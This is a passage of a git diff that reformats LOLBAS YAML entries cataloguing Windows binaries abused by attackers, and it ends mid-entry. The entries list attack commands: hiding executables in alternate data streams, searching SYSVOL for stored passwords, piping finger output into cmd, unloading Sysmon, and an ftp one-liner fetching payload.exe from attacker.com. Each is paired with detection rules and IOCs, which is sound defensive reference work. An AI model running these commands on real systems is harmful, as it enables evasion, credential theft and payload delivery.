Handle: '@oddvarmoe' diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index 0cac39e2..71c989bb 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -1,39 +1,44 @@ ---- Name: Explorer.exe Description: Binary used for managing files and system components within Windows -Author: 'Jai Minton' +Author: Jai Minton Created: 2020-06-24 Commands: - - Command: explorer.exe /root,"C:\Windows\System32\calc.exe" - Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe - Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: explorer.exe C:\Windows\System32\notepad.exe - Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe - Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 10, Windows 11 +- Command: explorer.exe /root,"C:\Windows\System32\calc.exe" + Description: Execute calc.exe with the parent process spawning from a new instance + of explorer.exe + Usecase: Performs execution of specified file with explorer parent process breaking + the process tree, can be used for defense evasion. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: explorer.exe C:\Windows\System32\notepad.exe + Description: Execute notepad.exe with the parent process spawning from a new instance + of explorer.exe + Usecase: Performs execution of specified file with explorer parent process breaking + the process tree, can be used for defense evasion. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 Full_Path: - - Path: C:\Windows\explorer.exe - - Path: C:\Windows\SysWOW64\explorer.exe +- Path: C:\Windows\explorer.exe +- Path: C:\Windows\SysWOW64\explorer.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer_break_proctree.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer.yml - - Elastic: https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml - - IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line is suspicious. +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer_break_proctree.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer.yml +- Elastic: https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml +- IOC: Multiple instances of explorer.exe or explorer.exe using the /root command + line is suspicious. Resources: - - Link: https://twitter.com/CyberRaiju/status/1273597319322058752?s=20 - - Link: https://twitter.com/bohops/status/1276356245541335048 - - Link: https://twitter.com/bohops/status/986984122563391488 +- Link: https://twitter.com/CyberRaiju/status/1273597319322058752?s=20 +- Link: https://twitter.com/bohops/status/1276356245541335048 +- Link: https://twitter.com/bohops/status/986984122563391488 Acknowledgement: - - Person: Jai Minton - Handle: '@CyberRaiju' - - Person: Jimmy - Handle: '@bohops' +- Person: Jai Minton + Handle: '@CyberRaiju' +- Person: Jimmy + Handle: '@bohops' diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index 91ae7171..0de0e467 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -1,26 +1,27 @@ ---- Name: Extexport.exe Description: Load a DLL located in the c:\test folder with a specific name. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Extexport.exe c:\test foo bar - Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll - Usecase: Execute dll file - Category: Execute - Privileges: User - MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: Extexport.exe c:\test foo bar + Description: Load a DLL located in the c:\test folder with one of the following + names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll + Usecase: Execute dll file + Category: Execute + Privileges: User + MitreID: T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Program Files\Internet Explorer\Extexport.exe - - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe +- Path: C:\Program Files\Internet Explorer\Extexport.exe +- Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extexport.yml - - IOC: Extexport.exe loads dll and is execute from other folder the original path +- Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extexport.yml +- IOC: Extexport.exe loads dll and is execute from other folder the original path Resources: - - Link: http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/ +- Link: http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/ Acknowledgement: - - Person: Adam - Handle: '@hexacorn' +- Person: Adam + Handle: '@hexacorn' diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index cb25dd8c..87e573b8 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -1,56 +1,61 @@ ---- Name: Extrac32.exe Description: Extract to ADS, copy or overwrite a file with Extrac32.exe -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe - Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. - Usecase: Extract data from cab file and hide it in an alternate data stream. - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe - Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. - Usecase: Extract data from cab file and hide it in an alternate data stream. - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt - Description: Copy the source file to the destination file and overwrite it. - Usecase: Download file from UNC/WEBDav - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe - Description: Command for copying calc.exe to another folder - Usecase: Copy file - Category: Copy - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe + Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of + the target file. + Usecase: Extract data from cab file and hide it in an alternate data stream. + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe + Description: Extracts the source CAB file on an unc path into an Alternate Data + Stream (ADS) of the target file. + Usecase: Extract data from cab file and hide it in an alternate data stream. + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt + Description: Copy the source file to the destination file and overwrite it. + Usecase: Download file from UNC/WEBDav + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe + Description: Command for copying calc.exe to another folder + Usecase: Copy file + Category: Copy + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\System32\extrac32.exe - - Path: C:\Windows\SysWOW64\extrac32.exe +- Path: C:\Windows\System32\extrac32.exe +- Path: C:\Windows\SysWOW64\extrac32.exe Code_Sample: - - Code: +- Code: null Detection: - - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml - - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32_ads.yml +- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml +- Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32_ads.yml Resources: - - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - - Link: https://twitter.com/egre55/status/985994639202283520 +- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ +- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +- Link: https://twitter.com/egre55/status/985994639202283520 Acknowledgement: - - Person: egre55 - Handle: '@egre55' - - Person: Oddvar Moe - Handle: '@oddvarmoe' - - Person: Hai Vaknin(Lux - Handle: '@VakninHai' - - Person: Tamir Yehuda - Handle: '@tim8288' +- Person: egre55 + Handle: '@egre55' +- Person: Oddvar Moe + Handle: '@oddvarmoe' +- Person: Hai Vaknin(Lux + Handle: '@VakninHai' +- Person: Tamir Yehuda + Handle: '@tim8288' diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index 0cf942a2..b719ef98 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml @@ -1,47 +1,54 @@ ---- Name: Findstr.exe Description: Write to ADS, discover, or download files with Findstr.exe -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: findstr /V /L W3AllLov3LolBas c:\ADS\file.exe > c:\ADS\file.txt:file.exe - Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. - Usecase: Add a file to an alternate data stream to hide from defensive counter measures - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe - Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. - Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: findstr /S /I cpassword \\sysvol\policies\*.xml - Description: Search for stored password in Group Policy files stored on SYSVOL. - Usecase: Find credentials stored in cpassword attrbute - Category: Credentials - Privileges: User - MitreID: T1552.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe - Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file. - Usecase: Download/Copy file from webdav server - Category: Download - Privileges: User - MitreID: T1185 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: findstr /V /L W3AllLov3LolBas c:\ADS\file.exe > c:\ADS\file.txt:file.exe + Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) + file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. + Usecase: Add a file to an alternate data stream to hide from defensive counter measures + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe + Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) + file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. + Usecase: Add a file to an alternate data stream from a webdav server to hide from + defensive counter measures + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: findstr /S /I cpassword \\sysvol\policies\*.xml + Description: Search for stored password in Group Policy files stored on SYSVOL. + Usecase: Find credentials stored in cpassword attrbute + Category: Credentials + Privileges: User + MitreID: T1552.001 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe + Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) + file.exe is downloaded to the target file. + Usecase: Download/Copy file from webdav server + Category: Download + Privileges: User + MitreID: T1185 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\System32\findstr.exe - - Path: C:\Windows\SysWOW64\findstr.exe +- Path: C:\Windows\System32\findstr.exe +- Path: C:\Windows\SysWOW64\findstr.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml Resources: - - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ +- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f Acknowledgement: - - Person: Oddvar Moe - Handle: '@oddvarmoe' +- Person: Oddvar Moe + Handle: '@oddvarmoe' diff --git a/yml/OSBinaries/Finger.yml b/yml/OSBinaries/Finger.yml index 936098f0..f41a753e 100644 --- a/yml/OSBinaries/Finger.yml +++ b/yml/OSBinaries/Finger.yml @@ -1,30 +1,34 @@ ---- Name: Finger.exe -Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon +Description: Displays information about a user or users on a specified remote computer + that is running the Finger service or daemon Author: Ruben Revuelta Created: 2021-08-30 Commands: - - Command: finger user@example.host.com | more +2 | cmd - Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' - Usecase: Download malicious payload - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 +- Command: finger user@example.host.com | more +2 | cmd + Description: Downloads payload from remote Finger server. This example connects + to "example.host.com" asking for user "user"; the result could contain malicious + shellcode which is executed by the cmd process. + Usecase: Download malicious payload + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows + Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, + Windows Server 2019, Windows Server 2022 Full_Path: - - Path: c:\windows\system32\finger.exe - - Path: c:\windows\syswow64\finger.exe +- Path: c:\windows\system32\finger.exe +- Path: c:\windows\syswow64\finger.exe Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml - - IOC: finger.exe should not be run on a normal workstation. - - IOC: finger.exe connecting to external resources. +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml +- IOC: finger.exe should not be run on a normal workstation. +- IOC: finger.exe connecting to external resources. Resources: - - Link: https://twitter.com/DissectMalware/status/997340270273409024 - - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) +- Link: https://twitter.com/DissectMalware/status/997340270273409024 +- Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) Acknowledgement: - - Person: Ruben Revuelta (MAPFRE CERT) - Handle: '@rubn_RB' - - Person: Jose A. Jimenez (MAPFRE CERT) - Handle: '@Ocelotty6669' - - Person: Malwrologist - Handle: '@DissectMalware' +- Person: Ruben Revuelta (MAPFRE CERT) + Handle: '@rubn_RB' +- Person: Jose A. Jimenez (MAPFRE CERT) + Handle: '@Ocelotty6669' +- Person: Malwrologist + Handle: '@DissectMalware' diff --git a/yml/OSBinaries/FltMC.yml b/yml/OSBinaries/FltMC.yml index c00cf3ea..b20f64e3 100644 --- a/yml/OSBinaries/FltMC.yml +++ b/yml/OSBinaries/FltMC.yml @@ -1,25 +1,25 @@ ---- Name: fltMC.exe Description: Filter Manager Control Program used by Windows Author: John Lambert Created: 2021-09-18 Commands: - - Command: fltMC.exe unload SysmonDrv - Description: Unloads a driver used by security agents - Usecase: Defense evasion - Category: Tamper - Privileges: Admin - MitreID: T1562.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: fltMC.exe unload SysmonDrv + Description: Unloads a driver used by security agents + Usecase: Defense evasion + Category: Tamper + Privileges: Admin + MitreID: T1562.001 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\System32\fltMC.exe +- Path: C:\Windows\System32\fltMC.exe Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/c27084dd0c432335fa4369e5002a61dfe0ab9c65/rules/windows/process_creation/win_sysmon_driver_unload.yml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_via_filter_manager.toml - - Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/unload_sysmon_filter_driver.yml - - IOC: 4688 events with fltMC.exe +- Sigma: https://github.com/SigmaHQ/sigma/blob/c27084dd0c432335fa4369e5002a61dfe0ab9c65/rules/windows/process_creation/win_sysmon_driver_unload.yml +- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_via_filter_manager.toml +- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/unload_sysmon_filter_driver.yml +- IOC: 4688 events with fltMC.exe Resources: - - Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon +- Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon Acknowledgement: - - Person: Carlos Perez - Handle: '@Carlos_Perez' +- Person: Carlos Perez + Handle: '@Carlos_Perez' diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index 4d7a5f4c..1b3575f8 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml @@ -1,36 +1,43 @@ ---- Name: Forfiles.exe -Description: Selects and executes a command on a file or set of files. This command is useful for batch processing. -Author: 'Oddvar Moe' +Description: Selects and executes a command on a file or set of files. This command + is useful for batch processing. +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe - Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. - Usecase: Use forfiles to start a new process to evade defensive counter measures - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" - Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. - Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe + Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 + folder. + Usecase: Use forfiles to start a new process to evade defensive counter measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" + Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match + for notepad.exe in the c:\windows\system32 folder. + Usecase: Use forfiles to start a new process from a binary hidden in an alternate + data stream + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\System32\forfiles.exe - - Path: C:\Windows\SysWOW64\forfiles.exe +- Path: C:\Windows\System32\forfiles.exe +- Path: C:\Windows\SysWOW64\forfiles.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml +- Splunk: https://research.splunk.com/endpoint/bfdaabe7-3db8-48c5-80c1-220f9b8f22be/ +- Splunk: https://research.splunk.com/endpoint/1fdf31c9-ff4d-4c48-b799-0e8666e08787/ Resources: - - Link: https://twitter.com/vector_sec/status/896049052642533376 - - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +- Link: https://twitter.com/vector_sec/status/896049052642533376 +- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ Acknowledgement: - - Person: Eric - Handle: '@vector_sec' - - Person: Oddvar Moe - Handle: '@oddvarmoe' +- Person: Eric + Handle: '@vector_sec' +- Person: Oddvar Moe + Handle: '@oddvarmoe' diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index 9bd8a080..7669cb0b 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml @@ -1,40 +1,42 @@ ---- Name: Ftp.exe Description: A binary designed for connecting to FTP servers -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-12-10 Commands: - - Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt - Description: Executes the commands you put inside the text file. - Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" - Description: Download - Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary. - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt + Description: Executes the commands you put inside the text file. + Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo + PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo + quit>>ftp.txt&@ftp -s:ftp.txt -v" + Description: Download + Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary. + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows + 10, Windows 11 Full_Path: - - Path: C:\Windows\System32\ftp.exe - - Path: C:\Windows\SysWOW64\ftp.exe +- Path: C:\Windows\System32\ftp.exe +- Path: C:\Windows\SysWOW64\ftp.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml - - IOC: cmd /c as child process of ftp.exe +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml +- IOC: cmd /c as child process of ftp.exe Resources: - - Link: https://twitter.com/0xAmit/status/1070063130636640256 - - Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939 - - Link: https://ss64.com/nt/ftp.html - - Link: https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/ +- Link: https://twitter.com/0xAmit/status/1070063130636640256 +- Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939 +- Link: https://ss64.com/nt/ftp.html +- Link: https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/ Acknowledgement: - - Person: Casey Smith - Handle: '@subtee' - - Person: BennyHusted - Handle: '' - - Person: Amit Serper - Handle: '@0xAmit' +- Person: Casey Smith + Handle: '@subtee' +- Person: BennyHusted + Handle: '' +- Person: Amit Serper + Handle: '@0xAmit' diff --git a/yml/OSBinaries/GfxDownloadWrapper.yml b/yml/OSBinaries/GfxDownloadWrapper.yml index 9675000a..84922c78 100644 --- a/yml/OSBinaries/GfxDownloadWrapper.yml +++ b/yml/OSBinaries/GfxDownloadWrapper.yml @@ -1,178 +1,182 @@ ---- Name: GfxDownloadWrapper.exe -Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path. +Description: Remote file download used by the Intel Graphics Control Panel, receives + as first parameter a URL and a destination file path. Author: Jesus Galvez Created: 2019-12-27 Commands: - - Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE" - Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service". - Usecase: Download file from internet - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows 10 +- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe + "URL" "DESTINATION FILE" + Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes + it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows + Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component + CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service". + Usecase: Download file from internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10 Full_Path: - - Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\ - - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\ - - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_209bd95d56b1ac2d\ - - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_3fa2a843f8b7f16d\ - - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_85c860f05274baa0\ - - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_f7412e3e3404de80\ - - 